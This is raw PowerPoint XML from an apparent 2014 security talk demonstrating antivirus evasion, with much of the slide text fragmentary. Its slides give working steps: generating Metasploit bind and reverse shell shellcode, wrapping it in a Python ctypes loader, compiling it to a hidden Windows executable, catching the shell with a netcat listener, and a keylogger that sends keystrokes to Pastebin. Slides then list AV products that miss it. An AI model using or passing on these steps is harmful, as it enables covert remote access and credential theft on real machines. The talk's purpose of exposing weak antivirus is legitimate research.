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256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="266" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="260" r:id="rId15"/>
    <p:sldId id="279" r:id="rId16"/>
    <p:sldId id="262" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="280" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="277" r:id="rId25"/>
    <p:sldId id="288" r:id="rId26"/>
    <p:sldId id="281" r:id="rId27"/>
    <p:sldId id="283" r:id="rId28"/>
    <p:sldId id="285" r:id="rId29"/>
    <p:sldId id="284" r:id="rId30"/>
    <p:sldId id="286" r:id="rId31"/>
    <p:sldId id="289" r:id="rId32"/>
    <p:sldId id="292" r:id="rId33"/>
    <p:sldId id="299" r:id="rId34"/>
    <p:sldId id="295" r:id="rId35"/>
    <p:sldId id="302" r:id="rId36"/>
    <p:sldId id="303" r:id="rId37"/>
    <p:sldId id="300" r:id="rId38"/>
    <p:sldId id="290" r:id="rId39"/>
    <p:sldId id="291" r:id="rId40"/>
    <p:sldId id="293" r:id="rId41"/>
    <p:sldId id="294" r:id="rId42"/>
    <p:sldId id="296" r:id="rId43"/>
    <p:sldId id="297" r:id="rId44"/>
    <p:sldId id="298" r:id="rId45"/>
    <p:sldId id="304" r:id="rId46"/>
    <p:sldId id="305" r:id="rId47"/>
    <p:sldId id="306" r:id="rId48"/>
    <p:sldId id="337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46" r:id="rId58"/>
    <p:sldId id="347" r:id="rId59"/>
    <p:sldId id="341" r:id="rId60"/>
    <p:sldId id="338" r:id="rId61"/>
    <p:sldId id="315" r:id="rId62"/>
    <p:sldId id="316" r:id="rId63"/>
    <p:sldId id="318" r:id="rId64"/>
    <p:sldId id="319" r:id="rId65"/>
    <p:sldId id="317" r:id="rId66"/>
    <p:sldId id="321" r:id="rId67"/>
    <p:sldId id="320" r:id="rId68"/>
    <p:sldId id="325" r:id="rId69"/>
    <p:sldId id="324" r:id="rId70"/>
    <p:sldId id="326" r:id="rId71"/>
    <p:sldId id="339" r:id="rId72"/>
    <p:sldId id="322" r:id="rId73"/>
    <p:sldId id="323" r:id="rId74"/>
    <p:sldId id="327" r:id="rId75"/>
    <p:sldId id="328" r:id="rId76"/>
    <p:sldId id="344" r:id="rId77"/>
    <p:sldId id="345" r:id="rId78"/>
    <p:sldId id="340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42" r:id="rId87"/>
    <p:sldId id="343" r:id="rId88"/>
    <p:sldId id="329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9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90557-D63B-1640-95DF-DE44DC0E7002}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/6/14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67C26-A583-A940-8C70-3004F490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3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6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2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53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4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5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6/6/14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67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6/6/14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8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6/6/14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32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03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25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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/6/14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2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779" y="149412"/>
            <a:ext cx="8748888" cy="3958724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Violent Python &amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t> The AV Scam</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>PLUS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EVIL Super-Advanced APT Tool </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>IPv6 attacks on FortiGate &amp; Vista</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>UC Santa Cruz Pwned</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>June 6, 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="TechDays_logo25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54" y="4419318"/>
            <a:ext cx="3175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33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v. Shell.exe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10.18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28" y="1600200"/>
            <a:ext cx="6679693" cy="484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1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Norton Identifies the Metasploit Packer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10.19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5784"/>
            <a:ext cx="8066956" cy="367566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16350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VirusTotal: 37/49 Detections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8-av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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="718085" y="1417638"/>
            <a:ext cx="7968715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0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8000" y="1955801"/>
            <a:ext cx="2768600" cy="2457450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to Become 007</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="rogermooreliveandletd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000" y="369543"/>
            <a:ext cx="4950000" cy="61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31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9.27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54" y="402770"/>
            <a:ext cx="5050303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5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3795889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1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp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4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 Metasploit Payloads to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2 at 11.30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1153"/>
            <a:ext cx="8366796" cy="288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4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Ctypes Python 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11.31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46986"/>
            <a:ext cx="8229600" cy="1599787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-22 at 11.32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85049"/>
            <a:ext cx="8229600" cy="112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8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Compile it on Windows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 these  things, in order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python 2.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PyWin32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pip-Win</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PyInstaller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This creates an EXE file that listens on a TCP port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-22 at 11.35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9452"/>
            <a:ext cx="9144000" cy="99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1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5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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msfpayload windows/shell_bind_tcp C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt; foo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nano foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change top to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from ctypes import *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shellcode = (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bottom to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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);</a:t>
            </a:r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memorywithshell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= create_string_buffer(shellcode, len(shellcode))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 = cast(memorywithshell, CFUNCTYPE(c_void_p)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"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shell()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114396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9.11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71" y="2004786"/>
            <a:ext cx="6350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2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5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Windows, in pip-Win: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venv -c -i pyi-env-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>name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pyinstaller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>--onefile --noconsole foo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101980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VirusTotal: 1/50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8-av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b="7039"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777203" y="1417638"/>
            <a:ext cx="7741241" cy="519511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70877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Tweeted about this, and @NortonSupport replied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>@NortonSupport gave me a link for a 30-day trial version :)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5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5.01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44" y="1600200"/>
            <a:ext cx="6740774" cy="47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8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Avast! doesn't detect it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky detects it as HEUR:Trojan.Win32.Generic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-23 at 4.46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77" y="3420343"/>
            <a:ext cx="5051777" cy="329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3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4191000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2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with a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5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norton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111" y="373945"/>
            <a:ext cx="40640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0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norton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7" y="437445"/>
            <a:ext cx="4025900" cy="30480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norton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7" y="3616678"/>
            <a:ext cx="40386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5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5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Kali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cp foo foo2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nano foo2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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x=raw_input("Press Enter to continue")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Windows, in pip-Win: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venv -c -i pyi-env-name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pyinstaller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>--onefile foo2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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05497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Norton, Avast, &amp; MSE Lose!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5.22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78" y="1600200"/>
            <a:ext cx="6335889" cy="49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9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378857"/>
            <a:ext cx="7772400" cy="3193143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" smtClean="0"/>
              <a:t>Antivirus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Ungh!  Good God y'all...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6700" dirty="0" smtClean="0"/>
              <a:t>What is it GOOD For?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4589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5.19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94" y="1600200"/>
            <a:ext cx="7103505" cy="47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1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3795889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3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in two stages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>no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5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Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Al these failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nod32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avast!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>360 Internet Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>McAfee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky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72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Mikko?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-secure's Mikko Hyppönen_ Full talk from Wired 2012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600200"/>
            <a:ext cx="813593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99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F-Secure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sec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7" y="1600200"/>
            <a:ext cx="6279444" cy="498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7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AV Challenge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7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98333"/>
            <a:ext cx="8229600" cy="2527830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Posted April 3, 2014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No reply from AV vendors, but Norton improved its detection after that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now a delay is required</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.3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1828"/>
            <a:ext cx="8229600" cy="779368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-24 at 7.34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353778" cy="164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3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3795889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4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with a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1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5664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On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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msfpayload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> LHOST=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>192.168.119.252 C &gt; rev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nano rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change top to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x=raw_input("Press Enter to continue")</a:t>
            </a:r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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ctypes import *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shellcode = (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bottom to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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);</a:t>
            </a:r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memorywithshell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= create_string_buffer(shellcode, len(shellcode))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 = cast(memorywithshell, CFUNCTYPE(c_void_p)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"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shell()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186603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5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Windows, in pip-Win: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venv -c -i pyi-env-name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pyinstaller --onefile rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nc –lp 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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26403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9.18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1032002"/>
            <a:ext cx="7946571" cy="253344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Screen Shot 2014-05-22 at 9.17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7" y="3970191"/>
            <a:ext cx="8146143" cy="1785147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43949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Loses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6.06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9" y="1600200"/>
            <a:ext cx="6505222" cy="463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3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Wins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6.07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11" y="2005486"/>
            <a:ext cx="7366000" cy="40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8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Advanced Malware Protection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04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03333"/>
            <a:ext cx="8229600" cy="6228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ty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ChrisAbdalla_1 from HP ESP TippingPoint</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.23.3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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="791633" y="273050"/>
            <a:ext cx="6997700" cy="2238728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Picture 8" descr="Screen Shot 2014-05-24 at 7.23.5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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="310445" y="2659239"/>
            <a:ext cx="8573911" cy="266739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27067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7222"/>
            <a:ext cx="8229600" cy="3938941"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A friend in the financial industry tested Evil.exe on a system protected by FireEye</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FireEye gives no alerts and lets it post keystrokes right to Pastebin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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7" y="201259"/>
            <a:ext cx="5116690" cy="1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Python Keylogger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63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844800" cy="2223029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google "Python Keylogger"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36333"/>
            <a:ext cx="2844800" cy="3289830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I used this one from 4 years ago</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.4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9" y="599194"/>
            <a:ext cx="5475646" cy="5851525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531637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Keystrokes to Pastebin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9-ch1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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="846665" y="1725070"/>
            <a:ext cx="7605889" cy="46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2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Pastebin busted me for making too many pastes in a 24-hour period</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So I wrote my own Pastebin imitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344622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&amp; Avast! LOSE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1.13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45" y="1715123"/>
            <a:ext cx="6152444" cy="469132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88915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Mikko Hypponen Video</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="F-secure's Mikko Hyppönen_ Full talk from Wired 2012_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600200"/>
            <a:ext cx="8135938" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101220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778"/>
            <a:ext cx="8229600" cy="931333"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton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4 at 11.28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55" y="1221171"/>
            <a:ext cx="6166556" cy="541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2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just add a delay...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4 at 11.46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9" y="1304749"/>
            <a:ext cx="7613335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2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222"/>
            <a:ext cx="8229600" cy="959556"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F-Secure LOSES!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2.02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417638"/>
            <a:ext cx="6533444" cy="53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3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PRODUCT ANNOUNCEMENT!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76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778"/>
            <a:ext cx="8229600" cy="917222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ultra-Advanced APT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92889"/>
            <a:ext cx="8229600" cy="93327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samsclass.info/evil.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 12.24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11" y="1120422"/>
            <a:ext cx="5537200" cy="36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9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2.28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56" y="633561"/>
            <a:ext cx="6152444" cy="60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54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UNSTOPPABLE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None of these products stop it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>McAfee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nod32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F-Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avast!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft Security Essentials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424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6-06 at 9.45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46" y="705596"/>
